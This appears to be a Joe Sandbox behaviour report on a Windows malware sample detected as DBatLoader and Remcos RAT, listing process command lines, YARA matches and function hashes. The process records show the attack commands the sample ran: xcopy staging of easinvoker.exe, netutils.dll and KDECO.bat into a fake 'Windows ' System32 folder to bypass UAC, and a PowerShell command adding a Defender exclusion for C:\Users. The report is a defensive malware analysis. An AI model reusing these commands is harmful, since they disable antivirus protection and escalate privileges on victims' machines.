Commandline:	xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0xcb0000
File size:	44'544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:30:42
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ECHO F
Imagebase:	0x50000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:30:42
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0xcb0000
File size:	44'544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:30:42
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ECHO F
Imagebase:	0x50000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:30:42
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0xcb0000
File size:	44'544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:30:43
Start date:	23/08/2023
Path:	C:\Windows \System32\easinvoker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows \System32\easinvoker.exe
Imagebase:	0x7ff60e670000
File size:	131'648 bytes
MD5 hash:	231CE1E1D7D98B44371FFFF407D68B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:30:43
Start date:	23/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Imagebase:	0x7ff6f1940000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	19:30:43
Start date:	23/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff766460000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:30:43
Start date:	23/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase:	0x7ff6f1940000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:30:43
Start date:	23/08/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase:	0x7ff62aed0000
File size:	447'488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:30:43
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 6
Imagebase:	0x13a0000
File size:	18'944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	19:30:44
Start date:	23/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff766460000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:30:46
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0xb30000
File size:	86'528 bytes
MD5 hash:	746F3B5E7652EA0766BA10414D317981
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	19:30:51
Start date:	23/08/2023
Path:	C:\Users\Public\Libraries\Elpuxpki.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Elpuxpki.PIF"
Imagebase:	0x400000
File size:	1'131'463 bytes
MD5 hash:	533B3DF0E597C50E1129EC807FD6BBCF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Elpuxpki.PIF, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	19:31:01
Start date:	23/08/2023
Path:	C:\Users\Public\Libraries\Elpuxpki.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Elpuxpki.PIF"
Imagebase:	0x400000
File size:	1'131'463 bytes
MD5 hash:	533B3DF0E597C50E1129EC807FD6BBCF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	19:31:18
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\SndVol.exe
Imagebase:	0x12c0000
File size:	226'264 bytes
MD5 hash:	1EF1A9B89A984DD25DB61DC1AF2548B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:31:32
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0xb30000
File size:	86'528 bytes
MD5 hash:	746F3B5E7652EA0766BA10414D317981
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Function 04E39B3A Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
Instruction ID: f93f3a587d31ec2167aec72392595182bd019ce6a0095da7c8667ca8ffbebd0b
Opcode Fuzzy Hash: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
Instruction Fuzzy Hash: 50317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 04E39B3A Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false

Associated: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
Instruction ID: f93f3a587d31ec2167aec72392595182bd019ce6a0095da7c8667ca8ffbebd0b
Opcode Fuzzy Hash: 9c1035a9cc056e3ce404db35ea2504aa87f6ce84aa14c6ad485a0ffd09ef03d4
Instruction Fuzzy Hash: 50317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 04E35A1C Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 04E3DD74 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.390838352.0000000004E3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E3C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e3c000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 04E38CC0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
Instruction ID: 56b8ffad9403e7d3bf51fb845874e0a7a4bfd1ec970ac7fca3ffe7b4cbf62598
Opcode Fuzzy Hash: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
Instruction Fuzzy Hash: EA112E6284E3D0ABDF069B7858945C67F80FA1371174BE5EBC890CF48FE364114B9B16

Uniqueness

Uniqueness Score: -1.00%

Function 04E38CC0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
Instruction ID: 56b8ffad9403e7d3bf51fb845874e0a7a4bfd1ec970ac7fca3ffe7b4cbf62598
Opcode Fuzzy Hash: a67aa279c2360b243954826f7662d6649a9a6d2b7e26e64c4f302e303bd04852
Instruction Fuzzy Hash: EA112E6284E3D0ABDF069B7858945C67F80FA1371174BE5EBC890CF48FE364114B9B16

Uniqueness

Uniqueness Score: -1.00%

Function 04E38D2C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
Instruction ID: f501798e23a459fd7d9c3e3073bd6276d9fec7069106ca2b73526e0b848788da
Opcode Fuzzy Hash: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
Instruction Fuzzy Hash: A901086184F3D06BDF458B38589058BAF44B81390070BDAEBCC50CF8CFA355411BA755

Uniqueness

Uniqueness Score: -1.00%

Function 04E38D2C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
Instruction ID: f501798e23a459fd7d9c3e3073bd6276d9fec7069106ca2b73526e0b848788da
Opcode Fuzzy Hash: 3b55cbb775517b65ce00c72499cdd8536e475b5ece931b95b2162223c24c86c3
Instruction Fuzzy Hash: A901086184F3D06BDF458B38589058BAF44B81390070BDAEBCC50CF8CFA355411BA755

Uniqueness

Uniqueness Score: -1.00%

Function 04E38D34 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
Instruction ID: 325ccd17d57f5d9608d6045cc7f50ec3bcc15015ae42b4a5d88a86d793612954
Opcode Fuzzy Hash: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
Instruction Fuzzy Hash: 4201D96144F3D06BDF459B38589058BBF44B91394130BDAE7CC50CF8CFA355411BA755

Uniqueness

Uniqueness Score: -1.00%

Function 04E38D34 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
Instruction ID: 325ccd17d57f5d9608d6045cc7f50ec3bcc15015ae42b4a5d88a86d793612954
Opcode Fuzzy Hash: 5fd037a3167b35d3bee3dd4b1ca515faaf046044032b4af3d33edc1392d4acf9
Instruction Fuzzy Hash: 4201D96144F3D06BDF459B38589058BBF44B91394130BDAE7CC50CF8CFA355411BA755

Uniqueness

Uniqueness Score: -1.00%

Function 04E38D3C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
Instruction ID: 3fd9366a49d97435f2358a93c8301323ff4c155dfaff832744019cc59cf68e99
Opcode Fuzzy Hash: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
Instruction Fuzzy Hash: EC01D46284F3D06BEF469B38589058BBF44B913A4130BDAEBCC50CF8CFA355411BAB56

Uniqueness

Uniqueness Score: -1.00%

Function 04E38D3C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.392440958.0000000004E38000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E38000, based on PE: false

Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
Instruction ID: 3fd9366a49d97435f2358a93c8301323ff4c155dfaff832744019cc59cf68e99
Opcode Fuzzy Hash: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
Instruction Fuzzy Hash: EC01D46284F3D06BEF469B38589058BBF44B913A4130BDAEBCC50CF8CFA355411BAB56

Uniqueness

Uniqueness Score: -1.00%

Function 04E46814 Relevance: 7.8, Strings: 6, Instructions: 254COMMON

Download Yara Rule

Strings

7, xrefs: 04E46985
L)@, xrefs: 04E46B2D
0)@, xrefs: 04E46A41
<)@, xrefs: 04E46A70
, xrefs: 04E46AF8
D)@, xrefs: 04E46A85

Memory Dump Source

Source File: 00000000.00000003.393365839.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E44000, based on PE: false

Associated: 00000000.00000003.397821170.0000000004E44000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e44000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$7$<)@$D)@$L)@
API String ID: 0-3088242726
Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
Instruction ID: 883eb68dc3669dbaaa4f1f2bc7d289e55e3b0510509f9b36c0af82414f36d555
Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
Instruction Fuzzy Hash: 13A1F830B043548BEF219B3CD884BD8B7E4EB8A718F1460F5D5499B382DB7DA989CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04E3E1E0 Relevance: 7.8, Strings: 6, Instructions: 254COMMON

Download Yara Rule

Strings

, xrefs: 04E3E4C4
D)@, xrefs: 04E3E451
L)@, xrefs: 04E3E4F9
7, xrefs: 04E3E351
0)@, xrefs: 04E3E40D
<)@, xrefs: 04E3E43C

Memory Dump Source

Source File: 00000000.00000003.390838352.0000000004E3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E3C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e3c000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$7$<)@$D)@$L)@
API String ID: 0-3088242726
Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
Instruction ID: 00c954bdfb149f36a52cfe823259b2268c2662f0372fa9227046e3d76b9f3d33
Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
Instruction Fuzzy Hash: C5A1F830F042648BEB22AB2CCC88BD877E5EF09315F5461F5D449EB381DB79A985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04E36090 Relevance: 6.4, Strings: 5, Instructions: 155COMMON

Download Yara Rule

Strings

<)@, xrefs: 04E360E4
D)@, xrefs: 04E360F9
L)@, xrefs: 04E361A1
, xrefs: 04E3616C
0)@, xrefs: 04E360B5

Memory Dump Source

Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$<)@$D)@$L)@
API String ID: 0-3013997273
Opcode ID: 919faa8700f0759cb40d9b13d5309978be2770204ccdbc6cda5c8e8ee7111fc7
Instruction ID: 6bbc8c49afa13a6743f393e040e3500e60fba56f1a62d2b7a2b07263698911cb
Opcode Fuzzy Hash: 919faa8700f0759cb40d9b13d5309978be2770204ccdbc6cda5c8e8ee7111fc7
Instruction Fuzzy Hash: F851DA20B043949FEB339B3CC8C8798BBE1EB09305F5465F5D089AB382DB759986CB15

Uniqueness

Uniqueness Score: -1.00%

Function 04E35E86 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

L)@, xrefs: 04E361A1
, xrefs: 04E3616C
0)@, xrefs: 04E360B5
7, xrefs: 04E35FF9

Memory Dump Source

Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$7$L)@
API String ID: 0-3436765255
Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
Instruction ID: 24e7f13c0e8264041f873f48d60f570be45f5f8c7cfce6e174cce62bd1579353
Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
Instruction Fuzzy Hash: DB71C730B042589EEB329B3CC888BD8B7E5EB09319F1461E6E049EB382DB7559C5CB55

Uniqueness

Uniqueness Score: -1.00%

Function 04E46812 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

7, xrefs: 04E46985
L)@, xrefs: 04E46B2D
0)@, xrefs: 04E46A41
, xrefs: 04E46AF8

Memory Dump Source

Source File: 00000000.00000003.393365839.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E44000, based on PE: false

Associated: 00000000.00000003.397821170.0000000004E44000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e44000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$7$L)@
API String ID: 0-3436765255
Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
Instruction ID: 079d88af71f993c8d088bff58eb70aec2ba0b8640d954c6981e49dd3a4f2188a
Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
Instruction Fuzzy Hash: 4471C530B042988FEF219B3CDC84BD8B7E4EB8A718F1060E5D58D9B281DB7969C5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04E3E1DE Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 04E3E4C4
L)@, xrefs: 04E3E4F9
7, xrefs: 04E3E351
0)@, xrefs: 04E3E40D

Memory Dump Source

Source File: 00000000.00000003.390838352.0000000004E3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E3C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e3c000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$7$L)@
API String ID: 0-3436765255
Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
Instruction ID: b47ce29c64687ebf25982b29b0b8a54a90a69f4364c10efe5a0aacc4361aa7ea
Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
Instruction Fuzzy Hash: 5871A430F042A88EEB229B2CCC88BD8BBF5EB09715F5461E5D049DB281DB75A985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04E35FC0 Relevance: 5.2, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

L)@, xrefs: 04E361A1
, xrefs: 04E3616C
0)@, xrefs: 04E360B5
7, xrefs: 04E35FF9

Memory Dump Source

Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd

Similarity

API ID:
String ID: $0)@$7$L)@
API String ID: 0-3436765255
Opcode ID: 313d5caafd23ea4199ddc2a6333175292bcea86a71a46013c55989caa23a4a17
Instruction ID: ff9bbc5e260703675cd8cffcfd433600d7d3a0df83b34d47fdb0be057691c077
Opcode Fuzzy Hash: 313d5caafd23ea4199ddc2a6333175292bcea86a71a46013c55989caa23a4a17
Instruction Fuzzy Hash: E851A630B042A49EEF329B3CC888BD8BBE5AB09305F5451E5D089AB382DB7559C6CB55

Uniqueness

